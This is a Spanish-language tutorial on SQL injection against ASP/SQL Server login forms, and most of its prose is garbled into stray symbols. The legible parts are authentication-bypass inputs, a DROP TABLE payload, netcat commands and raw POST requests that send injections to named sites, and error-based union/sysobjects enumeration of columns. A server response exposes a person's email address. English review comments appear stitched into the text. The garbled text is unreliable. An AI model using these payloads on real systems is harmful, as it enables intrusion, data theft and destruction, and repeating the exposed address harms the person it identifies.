!
! "
#$%& ' (
) " * + " ,-
# . / "0#$%
' " , *
) 1 % )" + ! " , *
, ") - **
2 #$% ' " - " "
3 #$% 4
) 5
, ! )
% " "
5 " 67" ) " " " . "
* 8* " ! 6 . "
. 5 9 " , # #$% 4
:) *
* + ;7 " /
# . ; , "
8< + " " = "
" " ) "
>; ) - " .>
5 " , "
4 ' " ; "
4 # ! " 8< # ! "
4 ! ' , *
? #$% 4 : " - " " , "
@ ' "
' " " A "
B * " + % " ' "
C ; "
A " " ' ) "
5. "
"" #
8 " )4 * " &
" 7 " " " ( D
# ) + = * 6 " " " " "
) & " + 6 9 & 6 & "
. " + " " .
! & 9 " " " " 6 ( " " "
. " & . " " 4 " " " "& "=
7 " + " ( " 7< " ) " . (( # +
2
; " " 6 " . " " .& 9 " ) ) * 9
* " " 6 ) + " " " ) "
5 . " & 7 " 6 (&
" " " . 4 #$%& " * " 9 " "
( " " " "
" $
! % & '
5 * " D C 2 . " " ) 4 ) " ) "
6 " . - ' & )4 6 " . 4
" * 9 " * " 9 " ) " " "& 9
" 9 ( " ) 4 ( ) "
& " * ) " * . "
4 " "
% " + 4 " . 4
#8$ 8% ># 8 . " $ + % . . > * 6
* 6 7 " D C & #8$ 8% +
* & 6 " . "& #$% E# $ + % . . F
! * " " " " D " & 9 - ( "
) " " ,- 9 " . &
9 . 4 #$% " 6 + = " " "
E#+) " & : + " * <F * 6 " "
51# CB@ + " #: * " CB
% . . = " 6 " " #$%BC + #$%C & " " )
4 " " " "& + .= . " 6 " " 6 " "
"
+& " D " " >! #$%> " 9 4 "
9 " " . 4 ) ) " 6 "
& ( 4 " " . " 4 " "= 9
. & 6 " " #$%2
" ) " " . 4 " . 6 "& 9 " +
9 " " " " 6 6 " 6 . 4
"
( ) * # +,
$ ( " " " " " ) " " " 9 - + " * &
) 4 ) 4 " " 9 " = " " = ,:# ! 9
"& 9 " * " & " ) ) 4 9 " 6 "
2 G " E, . * & " 6 " " " "
" " F& " * ) " D= " " ) " ) :# & " " " )
" ) " . " 6 " !' " "
%51
3
5 ) & " " C & 9 " " . ) " " "
( ) " ) & ) 9 . ) "
" 6 " 7 9 9 " )
4 & " 9 " ) * " " -
" . = " 6 6 " # & E! 9 "
) " 6 " 2F " 9 " * ) 4 = " *
9 " ) :# 2
% " 9 " 7" " " & +
) " " " ) " & " * * 9 - " . =
" :# " 9 " * & ) = )
9 " ) " :# 2 G " 1;
8 " " & " * ( ) 9 " 6
" " 6 & 9 = " . " 9 6
6 " .
' " & 6 " 9 " )= " #+) "
" - " , " 9 . :# +
" * G " 1;
, " * D CC = 6 " ) #0#$%& ) 4
) > " * #$% # 6 3 * G " 1;> H " & "
( = ( " " D CC2
, " " & 67" " " * #$%& " * "
6 " 6 " " " . E#$% F& 9 ( " . " "
" " " & " + CC? "
#$% @ " & " 9 " " " 9 6 "
#+) " G " 1;& + . #$%
CCB " * 0 " ) " .
. 6 " " "
5 ) . " & " * #$% " 6 " &
9 " " " " I ) & "
9 " ) " * " ) .
" - " , " ( #$% # 6 & " 6 ) "
9 " . " " & "
. " " "& " " " " 6 4 " "
" . " & 9 " " "
" " "& ) = " 4 6
" . . " " =" "
"- .# / ! 0
' 9 * & " " * &
* " 9 6 9 " " " * " +
9 " " "& " " " ) "
6 "& + " " #$% # 6 " < " .
?
# ) " ) + " " #$% ) " &
4 & * " " ) " " ) " " . 9
)6 ) = " ) 4 . & " 9
. " " & " 9 & "
& " + ) " ) 4 " E' "
" J " " " " #0#$% # 6 & 9 "
6 " " F
8 " " & " . " " ) " " 9 "
6 ) " " " " " " " #0#$% 9
" . & 6 6 " 9 "
. " )4 6 & " 7 " #$% 4
%# )
; . " & ". " *
" " " " + " 6 "& 9 4
" " #0#$%& " "* " * & 4
" " "& 9 ) " . 6 "
8 " #0#$% " . " "
>#5> + . " = " & "" * "
" > > E- KKF
8 " 9 . " = & 9 6
" #5 " ( . " " 6 4 " EIF " #0#$% # 6 &
) " " ) " " " & " ) 7 " " 6
" < " 6 . "& " 4 & " "
< "
( 1 ( * $# + )
#0#$% " < " " "& ) = " 1 % )"
6 L"& " 4 " "
. " " < " " ) 4 "
5 " " 6 " E#51& 5 ; M& !N #!N& ;'!& F + = "
" " ( 9 " 9 " " *
" " & " " " ;'! ! + 1 !
5 " + " 9 "
E8" F ( ) " " & " 6 #0#$%
# 6 & " " ;'! 332
5 ) " ) " I . " 9 .
" ) " + ) 4 "
6 " 9 " " "
+ * " " " " ) 9
" " ) " " " . & 9 " #0#$%
" & *
@
8 * 6 " ) " " = " " D "
6 #$% E! 4 #5 "" > >F " " " "
7 " + #$% " 9 6 " . "
& " 9 ) 7 "& " "
6 "& . ;:,:# " " " ) "
" 6 )
1
+ ( & ,#))
; , 6 % * " >; ! * . " *
#$% # 6 > O#$% # 6 " * " " " , ") "
- ** " " " > 8" " . * 9 1: < " 6 "& "
9 " " * * " + " "
6
P & " " " " 6= " 9 " "
" ,! " #$% # 6 " & "
) . " " " " " "
< "& 9 + " " ) < & " " "
" " 6 ) "
# ) " " " "
* " ") " ) ** #$%&
9 " " ) > M . 8< " G " >&
" ) " ") ) ** " ) " "
" " " >" 6Q * EF>
5 " < = " > M . 8< " G "
> E #-1 B303B 022CB0@F " " 9 (
< )
< Q M9
< Q " "
< Q <
< Q" "9 " +
< Q"9 .
< Q " "
< Q" 6
< Q " + "
< Q 6)
! -"""
" Q
" Q
" Q . +
" Q " +
" Q " +
"2 % & ,
; " ) & #$% " . 4 " " 5 "
" * " < " " " " " E!%0#$%
" : & ; " 0#$% " " * F "
6 "& < " . " " " "& . " "
" " & " * * " 6 (
" " " . "
% & +% + % ! .# . &
/ 51; ( . " "
8H:R8 ( 6 " "
,81S ( . "
% & ++ + + ) .# . &
' 85;8 ( 6 " ) "& " = "
, :! 8 ) " = "
5%;8
( * " ) " . . "
) * " "
% & + + #! .# . &
#8%8';
( " . " " ) " " 9
" "* .
1#8 ;
( . " " ) " "
J
!,5;8
( * " 6 " " " +
. " " " * "
,8%8;8
( . " " ) ) "
"
%! # #!
% " " " " " * ( " * " " 9
" "
%! # #!
A :
( " * ) " 6
" " . " "
G 8 8
( " * " " 9 )
" . " " 9 " 6 "
/ : ! -S
( " " . " " " "
. " " =* "
5H 1/
( < " 9 ) " "*
.
: ,8 -S
( " . " " " "
" *
B
3 % &
T 9
U + 9
TU , "
TV . 9
UV + . 9
V . 9
-8;G881 ( " * 6 6 "
% R8 (
1 ( " * . " " ) " "
4 & !
SELECT * FROM Tabla;
E8" " 6 6 " " " . " " ) >; ) >F
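-- Data-modifying example: overwrites the password column of every row whose
-- user column equals 'admin'. Keyword corrected from the misspelled "UPADTE",
-- which a SQL parser rejects.
UPDATE Tabla SET password = 'Juajuajua' WHERE user =
'admin'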
E8" " ( = "" " &
6 F
5 ) & " . 4 #$%& " * 9
4 " " "& " 9 " " * "
" " +
4 " #$% " & " "
" 4 " ! . * & = " "
* 4 " ) & " " " "
4 " " & 4
# ) " & " 6 " & " +
" " 9 6 " . "
& " " " 6 " 9 9
7 + #$% " " )
"5
#
# 6 7 " 9 . ( . * " 9 "& " .
" = " . " " >5 9 "
H ) " ' 8 >& " 9 * 6 & " " 9
" ) & & " " " #$% ) "&
C
" 6 " ) & )4 6 *
" " " = "
# ) " < 6 " " ) " "& "
6 " ) " . * & "
9 " " * " " 6 " 6
9 " . " 6 " " " <
+ . " " ) " " " " 6 )
5 " * " 4 . 4 J . " &
! " # " & " * "
" 9 . " " " 7 " " " 8
" & + )4 6 . .J
" " " & "
" ! " # & ) 4 " " . " "
0 8* " ! 6 . "
0 5 9 " , # #$% 4
0 :) *
0 8< + " " = "
0 ' " ; "
, " * & " 4 * 9 * + 9 .
) 4 " . " )4 6 " "
* " 6 "
( 6!
# ) 7 >#$% 4 > " ) J
) " " " * #0#$%& " 9 . "
9 " & " & 9
" " 9 )
. < 7<
8" " . * 9 " " ) " " " " " " 6
( " . " " * " 9 6 " " < " * "& "
9 & . " ". *
8" " 6 " " " =*
" " 9 + " " " G " * # 6 "
4 " ) " " 5#! ) " " " #0
#$%& " " " G " 9 *
" 6 " )
+ 4! $ (! &
5 9 " =" " 9 " "
" 6 ) & * " ( " " "
+ .= " " " < 7< "
8 9 + = " " " ) ) " ) 9
( 6 & " 9 ) 4 " "
" 9 " 9 " " " "
8" " ) 9 + = " " "& " 6 "
6 ) " "& ) "
" 6 " & " " 6 "
6 ) " " " " 6 " " 6 )& " 9
) 7 " * " " " ) " "
; " " " * " )& " " : % &
" " " & " " " " 6 "& + " ) * "
* " " 6 ) . " " ) "
+ " D
:M& " ) 6 " * + =
" " " " 9 " " . ) "
" ) M. & " . < " "
" + " " * " "
8 "& ) . ( ) " "
" ) .J " " " *
& 6 ( = " = " 6 " . " ) " .
"
<FORM action=logon/logon.asp method=post>
<input type=hidden username=_UserName password=_Password>
</FORM>
8" * . . & ) " " " " . " " . 5#!
9 " " 6 " & ) " " E!
+ J " " ( ) * ; %& 9
. 5#! " < ) " "& .
" " " . " " * ; % + 6 6
" " F 8 * 6 + ) ) & * &
" . " " + 6 . "=
-- Login query template: _UserName and _Password are placeholders for the
-- values taken from the logon form shown earlier on the page. When those
-- values are pasted into the statement text they become part of the SQL
-- itself, so a quote character in either field can change the statement's
-- structure. Bind both values as parameters (prepared statement) instead of
-- concatenating them.
-- NOTE(review): the direct comparison suggests the password is stored as
-- entered; confirm, and prefer comparing a salted hash.
select * from users where username = _UserName and
password = _Password
5 ) 9 " " " " & ( " " " . &
* " 6 " " " . "II ) " " "= + & " .
" " 6 6 4 & " " &
+ ) ) " " ) "
< " % " * " "
http://www.objetivo.com/libreria.asp?edicion='Noviembre'
! " " & " % = ) " " "
" " 9 + " . "
" ) + ) " " " .= EN,F ) 7 " "
L1 6 ) L " " " 6 . 5#! 9
" 8 " " & + ) )
) 4 . . ) " " "
"* " " " . 9 * 6 " 6 . "
select * from numeros_anteriores where edicion =
'Noviembre'
" & " 9 ) " " " * " " ) "
#$% > 6 >& = " " 9 " . * 7 "
" . & + . " + " + 9 ) "
" " " " & " " " 9 +
#$%
5 6 " " " * " " 4 " " "
& " " ) " " + " ! & " " L
E' # F ( " " " )
" " ( ) 4 " ) +
.
% L E' # F " " * #$% # 6 *
"& " 9 " 6 9
" 4 " * " 9 6
& " 9 " " " " )
9 + #$%
H " 4 9 = " " " " " .
) ( * . " + )
" " " & "
Usuario : An'gel
Password : 338xD
-- Statements produced when the submitted value contains an apostrophe
-- (An'gel, N'oviembre): the embedded quote ends the string literal early and
-- the remaining characters are parsed as SQL, so the statement is malformed.
-- A syntax error triggered by a single quote is a common sign that input is
-- concatenated into the query; bound parameters keep the quote as plain data.
select * from users where username = 'An'gel' and
password = '338xD'
select * from numeros_anteriores where edicion =
'N'oviembre'
8 ) " " " 9 " 9 " " " " " " "
#$% # 6 & " 9 " & " 9
" . " . ( " " +
" . "
username = 'An'
edicion = 'N'
% . & " . 9 " . " * "
"& #$%& * " ( & 4 "
" " & " 9 9 9 "
" " " + & " . * #$% # 6
5 ) 9 " = " " . + * . " 9
" " " L5 L + L1L II
8 " & . " " 6 " 9 9 " .J 6
6 67" ) " " + " " * "
" 4 " * " %& " " " ) "&
" " ( 6 & ( .
"
8" " * 6 & " 6 9 " " " " "
" " " )4 6 + ) 4 " " " " )"
" ) " " . " . & " " " " "
" " 6 "& " * " 9 " .
) " "
8 * 6 & 9 " " " . " " &
" " 6 6 . & ) ) . " .J . 7<
+ . )
A ) = " ) 7 & " " " " 6 "
& 9 " "
E84 " " ? >8 # 6 >F " 6 "
" ) 7 " " . & 9 + #$% " 6 ) " " 9 "&
9 " < 9 ) " " ) 4 + " (
7 " " " " ' " ' & " ) 4 > . #$%
# 6 " . #$% 4 > EH B * " + " "F
( ( 9 " " * .
6 ) " 9 " . " <
2
1 $ %
&
' (#)*
+! , - . , / %
0 ,
, 123
% &
- & ) " 6 9 * & " " " &
" ) " " " ) ) "
* " " " ) " " + "& . "
" I " + = " " "& + " 9 " .
& " ( .J ) " E! * >. . >F
) " " 9 " ." > . " > )
" " " . " " >% " ' ">
)4 6 6
6 7 ! 8 ( .
" 6 " " 7 " #$% 4 & " * 9 "
. " 9 " " "& 9 . " "
; %& 5#!& & " " " 6 ( 9 " < #$%
# 6 ' " 9 " ) "& "& .J "
6 ) & " & 4 & . " + ) 4 *
& 6 " " * " EH > % " ' ">F
# ) & " > 6 " > + = " " " = "
* " 6 & " " . 9 " ) ) + = " " " " "
9 & 4 & " " . " . " " "
) "=
8 " " & . " " 6 ) "
" 6 " # ) . " " " " ) "
* & 1: ) ) " & " " " " * " *
" " & " 6 " 6 "
" " ) E8" " ) "& ) 6= " "&
" ) 6 " + . F
9 ;:,5 * & 6 " " > "> " + J
9 " " " 6 ( " . 9 " )
! " " 6 " & . " =
& " ( . " 7 " " " 9 . * ) "
. " " 7 & "= ) 7 * 9 "
=
3
$ (! 6) $ (! ) & 3(
" " "
" " .= "& : 0%
! . " " & #
86 " : 0% & "
, " " +
* " .= & ! . "
" " " D " 9
" 6 " + ) " < "
" + * " " " "
" " " . *=
" "
"
- & 9 4 4 4
) " . "
4 " " " " " " " "
" ) "& 9
" "& " . "
" 6 "
* .
/ = " + "
5 " "
" " & )
) *
"& ) . " "
+ * "& " " ) 6 " "
"
! " " " . " . I ) & " 6 "
" * " "& " E> L >F * +
" 6 " * " ) 6 "
H 7 " " + .J " "
" " . " #$% = " " " * 9 "
" " . " " .
! " 9 + = " " " " "
* " ) * ; % 5#!& * " "
= " " 9 6 " 9 " " " 6 "& . "
# 5 : + !5##G: , " " .
. 5#! 9 ) " + 6 #$% ; ) 7 = "
" 9 * " " 6 #$% " < " "
. " " " 4 "
! 6 " 4 8" " * . < = " )
6 ) & . *=
---- Extracto -------------------------------------------
<FORM action=ingreso.asp method=post>
<TABLE cellSpacing=1 cellPadding=3 width=440
bgColor=#ffffff border=0>
<TBODY>
<TR bgColor=#ff0066>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
?
size=2>Nombre</FONT></B></TD>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
size=2>Clave</FONT></B></TD></TR>
<TR bgColor=#ffcccc>
<TD><INPUT name=USERNAME> </TD>
<TD><INPUT type=password value="" name=PASSWORD>
</TD></TR>
<TR align=middle bgColor=#ff0066>
<TD colSpan=2><INPUT type=submit value=INGRESAR!
name=SUBMIT>
</TD></TR></TBODY></TABLE><BR><BR></FORM></TD>
<TD vAlign=top align=left width=10> </TD>
<TD vAlign=top align=left width=140>
<TABLE cellSpacing=0 cellPadding=0 width=140 border=0>
<TBODY>
---- Extracto -------------------------------------------
! " 9 * ( = & ; % " "& + "
4 . 5#! E! " " & . " " F
5 ) & " " 9 ) 4 ( . " " & "
9 6 " " " " " "&
" " " 9 * #$% " 6 " " ) "
) . 9 + " 6 " "
select * from users where username = 'Angel' and password
= '338xD'
! " " 9 " " + "" 9 . ) < "
) " " 9 ( " * 9 = 6
( 6
) " " ) * " "
) #$% 4 " I :M& 6 "
" * = " " + . "
" " + " D . " 'or 1=1—
Usuario : 'or 1=1--
! "" L V W
A 47 " "& 9 = " . ) +
.
select * from users where username = ' or 1=1-- and
password = ' or 1=1--
@
1 9 " 9 " < " " " >: > 9 " &
" " " 6 6 " 6 E " 6 " ) F &
. + = " " " " " " " . " "
1 ( ,
0 4
Usuario : 'OR''='
Password : 'OR''='
5
4/
' ) & " " 6 + 6 4 .
" > " ">& " " " > 00 > E, ) / F "
#$% ( & " "
"& #$% 9 . 9 6 .
. +
# ) " " 7 " . " 6 " 9 . "
< + " & " & " 6 "
& " ) "& " . "
" & ( " 6 .
# . 4 & " " " " " " 9 < "
" " )4 6 & .J " * >5 > > > " =
+ . "
Usuario : Admin'--
Password : 'or 1=1--
8 = & " 9 " " = " " " .
-- Statement as it reaches the database for the Usuario/Password values shown
-- just above: "--" starts a SQL comment, so the text after 'Admin' (the
-- password comparison) is not evaluated. With bound parameters the whole
-- field, including the quote and the "--", is compared as a literal user name.
select * from users where username = 'Admin'-- and
password = ' or 1=1--
# " * "= + " . 4 & ) ) + "
.
8 " & " 6 " ) 6 " " " > L >
E' " F " " + > 00 > E, ) / F
6 9 " + " < "& " ) "
" " > " . "> 6 " ) "& 9 "
" " " .
) 4) # $ 7 ! . ! #
5 " " " " " * " <
#$% + . & " 6 " ) 9 6
6 . " " ) " * " " " " . 9
" "
' + = " 9 " " & . + & = "
* & ) 4 " > < " . > 9 " + * .
" + " " " " " "
! " 9 . E' + < " F& " " "
"& " " " " " . & . 9
9 " J " " ) " " "& + " 9 "
6 " " " & 4 & " 6
* " " " " " 6 " " "
" ) 4 & " 6 " 4 & " + *
" " " ) " < 6 . &
. " 9 " " " . "
" " 6
5 " * " " ) " * " " "& "
6 6 . " " ( " " "
9 D ) "9 " + *
" " * "
1 7 ! $ 7 ! . % #
"
' ; #$% # 6 & + " 6
" " 6 & " 6 . " " 6
##$%#8 H8 & " >
< > < Q "
) & " ) + > > " " "
" ) " " #$% # 6
)Q
) " ) " ) " " *
) ) "& 6 " )4 "& +
. ) " " *
" 1
) " " )4 " ) " "
" . " 8 4
" " " " " . * .J
8 " " "& "
" . * " " " " ) " +
6 " "
B
. 6 9# + &
% " 9 " , . # 6 & . & " " " D " &
" 6 " " " " " E' = " 5 F
" " E8 " " * 9 " 9 " .
) " = " & 4 " " 6
" ( + ( & F
5 * " " " " " 9 " 6 " " &
9 6 " & " .J ) . 6 9 J *
9 " & . 4 & " " " " 9
= . " " 6
8 6 " " & M " " *
" & 6 ) + #$%& = 4 & &
9 4 " " "
Usuario : '; drop table usuarios--
Password :
# * & " " 6 . "
* EH " >8* " ! 6 . " >F &
) ) ) > " "> " & 9 "
& .J " * " * "
' & + " " " & 6 "
6 ) ( " " & 6 5"= + &
" 9 , # " " " " 9 " .
7 " " ) "& 9 ) " ( & ) = "
+
1 $ % %
+ 67 & 4/
) . $
: 3( ) & ! #&
! ) ) " * " " " " (
7 " #$% 4 & " " " ) " 9 )
" " :,-' :%8 ,- 4 " #$% # 6 .
( D "
# ) " " 9 & " .
" & " " . 7< &
" " " E " 9 ) " " ( = &
. ) " 6 "& . " ) " 9
& + " " ) " " " * F
C
" 9 " " " 6 ) " + *
1 8 .1)
8 & " 9 6 ( " 6 " & 6 "
" " 6 " ) " " " 9 "
6 ) " "& . "
+ * & " " * 9 " <
" " 4 " " & + " " " 6 " "
" " + " 6 ( "
! " " " . 4 & " " " )
" > L > E' # F "
" D * " " .
Warning: SQL error: [Microsoft][ODBC SQL Server
Driver][SQL Server]Unclosed quotation mark before the
character string '')'., SQL state 37000 in SQLExecDirect
in php/db_odbc.inc on line 61 Database error: Invalid
SQL: Select * from usuario where (usuario.login=''')
ODBC Error: 1 (General Error (The ODBC interface cannot
return detailed error messages).) Session halted.
- & 6 " 9 * " < " :,-'
:)6 " " " * #$%
% < ) " " " . "
E > )Q ) >F
2 ! " * )Q ) & " 9 "
3 8 ) ) " " ( " > " >
? " " " " > . >
- & " 9 6 + " 6 " . * 9 +
. " " :,-' 8 )Q )
1 3
%
)
010.8#* - "3.9$
(")-#) :;<<
123
----- Fragmento -----------------------------------------
<?php
/*
* Session Management for PHP3
*
* Copyright (c) 1998-2000 XXXXXXXXXXXXXXX
(XXXXXX@XXXXX.XXX)
* Modified by XXXXXXXXXXXXXXXXXXXX
(XXXXXX@XXXXX.XXX)
*
* $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $
*/
class DB_Sql {
var $Host = "";
var $Database = "";
var $User = "";
var $Password = "";
var $UseODBCCursor = 0;
var $Link_ID = 0;
var $Query_ID = 0;
var $Record = array();
var $Row = 0;
var $Errno = 0;
var $Error = "";
----- Fragmento -----------------------------------------
- " " " " >" " > 6 " "
6 " " 6 ) " X " + X! "" " "
. & " 9 " ( " " " . " " 6 " " " "
* & . " 6 4 * . 9 "
* & " "& 9 * 9 9 6 " #$%&
A " + 6 & " " . " 6 "
" " . " " < 9 " 6 "
* " " " ) E8 " " = ) "
)Q ) F
: ) & * / !
:M& 6 " " 9 + #$% + "
* 6 " ) " " ) "
"& * .
+ " " " ) 9 4 * "
+ . & " 9 4 " " ) " 6 +
.
8 " " 6 " " " " ( &
" ( 7 " #$% 4 & "
"
! " 9 " 6 " " " * & . "
6 4 6 " " & " " 9 "
" ) "& J " " ( 9 " "
" ) " " ) < 9 6 7 " ;;! " 6
"
# " + ) " " ' % E8 M
" " B * " + % " ' "F&
9 " " " ) 4 E5 . 6 &
" . F " . . = "
- " 9 " 6 " " " " 6 " * "
7 " ;;! " )4 6 & " < " "& (
9 D " 6 " < & " " " 6
< & " . *
nc -vv www.objetivo.com 80 < sentencias.txt
' "
' + " * " " ;;! *
& ( " ** * E8 " " * # +1 & "
8 9 F& . . " ) )4 6 . "
) " + " D " * " E5 . ) " " " F& " 6
" "
8" * "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 34
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Angel&txtPassword=Angel
Y Y
Y H . " >! "" >
Y * . "
Y
H . " > " >
* . "
- & " . 9 " " * !:#; )
" " ** 6 < 9 4 < & " "
) " " " .
! " 9 " " . + " ) 9 " "
" " ) " + ) > L > E' " F
* & 6 6 " & )
( " ) " * ) ( 6
* ! " " 6 " " " " " " #$% 9
" " E 6 .& . )+& F
8 )4 6 " " ( > > " " ' " "
" " > "> #$%& " * " 6 " * " 9
6 9 #$% E 4 6 < & " 4
:%8 ,-F ) " " " " )" 6 "& " 4 " * 6 "
" 6 " "
H 6 " " " 4 < 6 " " " * "
( " 7 !:#; 9 " ( " 6= (
" ) 4 6
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 46
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27having+1%3D1--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L 6 . V 00 E8 Z 6 .[ Z2, 00F
2
1 .
$ " =
3 )*1(
5*'>
! ) 6 " " " . " " " 6 !:#;& " 9 "
" " ) " > "> " " " " ;;!
% ) " " ( * " "
9 6 " 6 "
! + 4
 ' # Z
] ! + ' Z2-
, " ! " Z25
O O 8" [ Z
V # . . Z2,
& ' Z '
E ! 7 " " Z B
F ! 7 " " Z C
U + Z28
T Z2'
5 )
!
[ " Z -
0 " 0
^ - M # " Z?'
Q " Q
:MK 9 " ( " 4 < & " " " " (
" 6= & + 6 9 " ! " 6 "
6 = 9 " 6= " "
" 9 " 6 " 9 " & + 6 " 9 "
" " " " )
8 "
nc -vv www.objetivo.com 80 < Injection.txt > result.html
- 6 " 9 " 9 . " " + > 6 .>&
) " 6 " * " 9 4 " "
! " " " & . " & " 7
* " 9 " " * " )
" " " " + "
H " 9 4 " "
3
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UserID' is invalid in the select
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
! * KK " " " & " )" 6 9
" 4 " & 6 :,-' #$% # 6 " 6 6 )
) ) " " ( * " " . .
E # 5 :#F& "= ) 7 " E " ,F
5 9 " ) ) & " * " = &
" 6 6 " " * 4 < + ( " " * "
" "& " " " ) # 5 :#
H " 9 = " * " 6 !:#;
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 71
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx
=COUNTRYNAME=Argentina
txtUsuario=%27group+by+usuarios.UserID+having+1%3D1--
&txtPassword=Angel
Y Y
H 9 6 " Y
>! "" > * Y
. "
H + L. )+ " " " , 6 . V 00
% . 4 6 " = & 6 " " .
"
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UID' is invalid in the select
?
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
6 ( " " " & " 9 " " > 6 .>
" 6 ( " >. )+> " )
+ " , ) # 5 :#& " " ,
# . " .= & " " " " " +
" " 9 ) # 5 :# ( "
> . " > * " " "& "
> 6 > " ) " + 8" " =
*
'group by usuarios.UserID,usuarios.UID having 1=1--
#! ! *
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Nombre' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
*
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre
having 1=1—
#! ! *
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Email' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
@
*
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre,
usuarios.Email having 1=1--
#! ! *
HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date:
Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved
Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23
GMT Connection: close Location: PaginaPersonal.asp
Content-Length: 139 Content-Type: text/html Set-Cookie:
xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US
ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun,
16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private
Object Moved
This object may be found here.
:M 9 =& " )" 6 " + )
" . > " " 8 > 8 9
" " 9 & ) " . * ) " . "
> > " ( " #8%8'; . E/ " 1
F A=4 " 9 " " !:#; ;;! 1: " & " 9
" " " 6 . " " " "
) " "& 4 6 9 #$% 6
+
E8" " L. )+ " " " ,& " " ,& " " 1 ) & " " 8
6 . V 00F
, " & " " 9 & * "
* " " " " ) &
( " " " . "
' & . " " " " " . " 9 ;:,:# " "
) " " #8%8'; . & " "&
9 + 9 " " " " #8%8'; " + 9 *
" " II 6 " 4 < " #
9 " * " " .
SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x
AND campo5=y
( 7 E8" " >. )+> + > 6 .>F "
) = " " ) " > >& > > + > 2>&
" ) = " < " > ?> E, * " " 9 "
. * >#8%8'; _ A : ` a> " = " & " * )
" + " " " 7 F " " " " " "
) ( . " "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 297
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy
sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3
D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro
m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na
me%3D%27usuarios%27+order+by+1+desc%29+order+by+1--
&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > * . "
Y
Y
H + "L " ) & & & * "+" )4 " & "+" "
) V) VL " "L ) E" )
* "+" )4 " & "+" " ) V) VL " "L
)+ " F )+ 00
- 9 " " " III H "& ( " +
> "> = ) " 9 " " # * " (
" " . & " "
+ % . " 1 :1 " . + 9
" " " & " " " " ) " " "
#S#:-b8';# + #S#':% 1# " > ,> * 9
" ) " 6 (
" ;:! E8 " " F % " " " (
1 6 9 " " 6 " #8%8';
7 " "& "= * 9 ) 6 " "
B
4 ;:!& " 9 . " "
;:,:# " " ) )4 6 "
!:#; 6 ;:! F
% " 9 = " ) " " " . " "
" &
Ups' union select b.name,1,1,1 from sysobjects a,
syscolumns b where a.id=b.id and a.name='usuarios' and
b.colorder = 48 --
7 " & 4 " 4 " + J . "
" " E! 4 9 " " " " " ) (
" > >F
! 6 " " " 7 " 4
